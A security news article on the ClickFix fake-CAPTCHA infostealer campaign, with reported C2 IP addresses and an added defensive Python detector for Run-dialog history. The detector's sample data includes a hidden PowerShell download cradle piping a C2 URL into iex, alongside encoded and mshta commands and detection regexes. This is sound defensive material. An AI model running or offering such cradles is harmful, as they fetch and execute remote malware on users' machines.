New ClickFix Attack Exposes Crypto Wallets and 25+ Browsers to Infostealer Malware


Cybersecurity Researchers Uncover Sophisticated Phishing Campaign

Cybersecurity researchers have uncovered a sophisticated phishing campaign leveraging fake CAPTCHA challenges to distribute a potent infostealer malware.

The ClickFix Campaign

The operation, dubbed ClickFix, has been found to target over 25 web browsers, cryptocurrency wallets such as MetaMask, and gaming accounts.

Attack Tactics

The attackers’ tactics involve deceiving users into running a malicious PowerShell command themselves: the command is executed by the victim, not by a browser exploit, which is what makes the lure effective.

“The ClickFix campaign is an evolution of a previous attack that targeted restaurant bookings in early 2025.”

Multi-Stage Infection Process

This latest iteration employs a multi-stage infection process, which begins when a user visits a compromised website and is presented with a fake CAPTCHA verification step.

The "verification" is the lure: the page places a PowerShell command on the clipboard and instructs the user to paste it into the Windows Run dialog and press Enter. When the user pastes, the clipboard contents are read through the Windows CClipDataObject::GetData function, and the command is executed under the user’s own account without any browser vulnerability being involved.

Command and Control Server

Further analysis revealed that the pasted PowerShell command reaches out to a command and control (C2) server located at 91.92.240.219.

This C2 server is used to download additional malware components, including Donut, a loader that converts a payload (for example a .NET assembly or a native executable) into position-independent shellcode so it can be run from memory rather than written to disk as an executable, which helps the attackers evade file-based detection.

Malware Components

The Donut output is a shellcode blob named cptch.bin, which is loaded directly into the process’s memory; because no conventional executable is dropped, the malware is difficult to detect with standard file scans and is best caught through behavioural or memory-based detection.

Primary Objective

The primary objective of the ClickFix infostealer is to exfiltrate sensitive data from compromised systems.

The malware is designed to target cryptocurrency wallets, including MetaMask, Exodus, and Trust Wallet, as well as saved login credentials from over 25 web browsers, including Chrome, Edge, and Opera GX.

Additionally, the malware targets Steam accounts, VPN client configurations, and FTP credentials used for website management.

Detection and Persistence

Researchers noted that the attackers made a critical mistake by using a variable name, $finalPayload, which triggered a detection by Microsoft Defender, flagging it as Behavior:Win32/SuspClickFix.C.

However, the attackers continue to host various versions of the malware across different IP addresses, including 94.154.35.115 and 178.16.53.70.

Researchers also observed the pasted command recorded in the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU). That key is the Run dialog’s history, not an autostart location: nothing in it is re-executed at boot, so it is a forensic artifact that shows what the victim pasted rather than a persistence mechanism. It is nonetheless worth checking during triage, since a ClickFix infection leaves the full download cradle sitting in that history.
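The following is an added example, not code from the article or the researchers it cites. It parses RunMRU-style entries and flags commands with the ClickFix shape (a script launcher combined with a hidden window, a policy bypass, an encoded command, a download cradle or an IP-literal URL), treating the three IP addresses named in the article as known C2 indicators. The registry values below are constructed to mimic what the key contains (per-slot values ending in `\1` plus an `MRUList` giving most-recent-first order); the indicator names and the constructed URLs are this example’s own, and the verdict thresholds are an assumption a real deployment would tune.

```python
"""Flag ClickFix-style download cradles in Windows Run-dialog history (RunMRU).

Added example, not from the original article. The sample entries are
constructed; the C2 addresses are the ones the article reports.
"""
import re

# IP addresses the article names as hosting the ClickFix C2 and payloads.
KNOWN_C2 = {"91.92.240.219", "94.154.35.115", "178.16.53.70"}

# Heuristic indicators (names are this example's own, not Defender's).
PATTERNS = {
    "script_launcher": re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "bypass_policy": re.compile(r"-e(xecutionpolicy|p)\s+bypass\b", re.I),
    "encoded_command": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression|downloadstring|curl)\b",
        re.I),
    "ip_literal_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
}
# Indicators that, together with a launcher, justify a "suspicious" verdict.
STRONG = {"download_cradle", "ip_literal_url", "encoded_command"}
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

# Constructed RunMRU contents (what Get-ItemProperty on the key would return).
# Each slot value ends with the literal "\1" marker Windows appends.
SAMPLE_RUNMRU = {
    "MRUList": "cedab",  # most recent first: c, e, d, a, b
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -ep bypass -c "iwr http://91.92.240.219/check -UseBasicParsing | iex"\\1',
    "d": "mshta https://203.0.113.7/verify.hta\\1",
    "e": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA\\1",
}


def parse_runmru(values):
    """Return (slot, command) pairs most recent first, following MRUList order.

    Strips the trailing "\\1" marker that real RunMRU values carry.
    """
    out = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        if raw.endswith("\\1"):
            raw = raw[:-2]
        out.append((slot, raw))
    return out


def classify(cmd):
    """Return (verdict, indicators) for one Run-dialog command line."""
    hits = [name for name, rx in PATTERNS.items() if rx.search(cmd)]
    # Any command that talks to a reported C2 address is conclusive.
    if any(ip in KNOWN_C2 for ip in IPV4.findall(cmd)):
        hits.append("known_c2")
        return "malicious", hits
    # A launcher typed on its own ("cmd", "powershell") is ordinary admin use;
    # a launcher combined with a cradle, an IP-literal URL or an encoded
    # command is the shape ClickFix asks the victim to paste into Win+R.
    if "script_launcher" in hits and STRONG & set(hits):
        return "suspicious", hits
    return "benign", hits


def scan_runmru(values):
    """Classify every RunMRU entry; returns a list of finding dicts."""
    findings = []
    for slot, cmd in parse_runmru(values):
        verdict, hits = classify(cmd)
        findings.append({"slot": slot, "verdict": verdict,
                         "indicators": hits, "command": cmd})
    return findings


if __name__ == "__main__":
    for f in scan_runmru(SAMPLE_RUNMRU):
        print(f"{f['verdict']:10} slot={f['slot']} {f['indicators']} :: {f['command'][:60]}")
```

On a live host the same dictionary can be built from `winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU")` and `winreg.EnumValue`, one value per user hive; the MRUList ordering is what lets an analyst line the pasted cradle up against the time the fake CAPTCHA page was visited. Note that a benign `powershell` or `cmd` entry on its own is deliberately left as benign, since those are common in administrator history.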

Conclusion

This sophisticated phishing campaign highlights the importance of exercising caution when interacting with online security checks, as even familiar verification steps can be exploited by attackers. A legitimate CAPTCHA never asks the user to open the Run dialog or paste a command; any "verification" that does is a ClickFix lure and should be reported rather than followed.

The ClickFix operation serves as a reminder that cybersecurity threats are constantly evolving, and users must remain vigilant to protect themselves against such attacks.

By understanding the tactics, techniques, and procedures (TTPs) employed by attackers, individuals and organizations can better defend themselves against these types of threats.
